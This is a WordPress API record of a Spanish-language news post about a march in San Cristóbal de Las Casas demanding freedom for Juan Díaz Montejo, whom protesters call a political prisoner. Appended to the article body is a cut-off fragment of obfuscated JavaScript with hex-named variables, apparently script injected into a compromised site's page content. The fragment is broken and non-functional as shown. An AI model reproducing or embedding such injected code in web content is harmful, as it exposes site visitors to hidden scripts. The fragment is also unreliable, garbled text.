{"id":10752,"date":"2023-06-27T01:32:12","date_gmt":"2023-06-27T01:32:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10752"},"modified":"2023-06-27T01:32:12","modified_gmt":"2023-06-27T01:32:12","slug":"piden-libertad-a-preso-politico","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10752","title":{"rendered":"Piden libertad a preso pol\u00edtico"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230626-WA0417-1024x768.jpg\" alt=\"\" class=\"wp-image-10753\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230626-WA0417-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230626-WA0417-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230626-WA0417-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230626-WA0417.jpg 1408w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal&nbsp;<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Familiares de Juan D\u00edaz Montejo realizaron una marcha en esta ciudad y una manifestaci\u00f3n a las afueras de Palacio de Justicia, donde pidieron la liberaci\u00f3n de este preso pol\u00edtico a quien le pusieron una condena injusta de 10 a\u00f1os de prisi\u00f3n.<\/p>\n\n\n\n<p>En conferencia de prensa, integrantes de la Coordinadora Internacional de Solidaridad por la Libertad de Presos Pol\u00edticos y Revolucionarios del Mundo Base Chiapas y estudiantes de la Escuela Normal Ind\u00edgena Intercultural Biling\u00fce Jacinto Canek, denunciaron que Horacio Garc\u00eda Estrada, juez en materia penal del distrito judicial de Comit\u00e1n de Dom\u00ednguez, decidi\u00f3 darle la sentencia por orden pol\u00edtica.<\/p>\n\n\n\n<p>\u201cNo tom\u00f3 en cuenta las pruebas presentadas por la defensa de Juan D\u00edaz Montejo para demostrar su inocencia. Una de ellas es que las personas ofendidas manifestaron ante este Juez de Causa que Juan D\u00edaz Montejo ni siquiera estuvo en el lugar de los hechos y dijeron no conocerlo; los otros testigos fueron citados 11 veces por este juez y no se presentaron a las diligencias. No existen elementos de tipo penal que acredite la culpabilidad penal&#8221;.<\/p>\n\n\n\n<p>Agregaron que el Juez lo declar\u00f3 culpable del delito: &#8220;Atentados Contra la Paz y la Integridad Corporal y Patrimonial de la Colectividad y del Estado&#8221;, delito fabricado, lleno de anomal\u00edas jur\u00eddicas y violaci\u00f3n al debido proceso penal, sin respeto a las garant\u00edas constitucionales y a los tratados internacionales de Derechos Humanos.<\/p>\n\n\n\n<p>Demandaron la sentencia de libertad absolutoria, por ser un preso pol\u00edtico, luchador social y reconocido dirigente que defiende derechos fundamentales de los pueblos que representa.&nbsp;<\/p>\n\n\n\n<p>Despu\u00e9s de la manifestaci\u00f3n en el Palacio municipal, los inconformes marcharon por las principales calles de esta ciudad, hasta llegar a la Plaza de la Paz, en donde concluyeron con un mitin.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal&nbsp; San Crist\u00f3bal de Las Casas.- Familiares de Juan D\u00edaz Montejo realizaron una marcha en esta ciudad y una manifestaci\u00f3n a las afueras de Palacio de Justicia, donde pidieron la liberaci\u00f3n de este preso pol\u00edtico a quien le pusieron una condena injusta de 10 a\u00f1os de prisi\u00f3n. En conferencia de prensa, integrantes de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10753,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10752","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10752","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10752"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10752\/revisions"}],"predecessor-version":[{"id":10754,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10752\/revisions\/10754"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10753"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10752"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10752"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10752"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}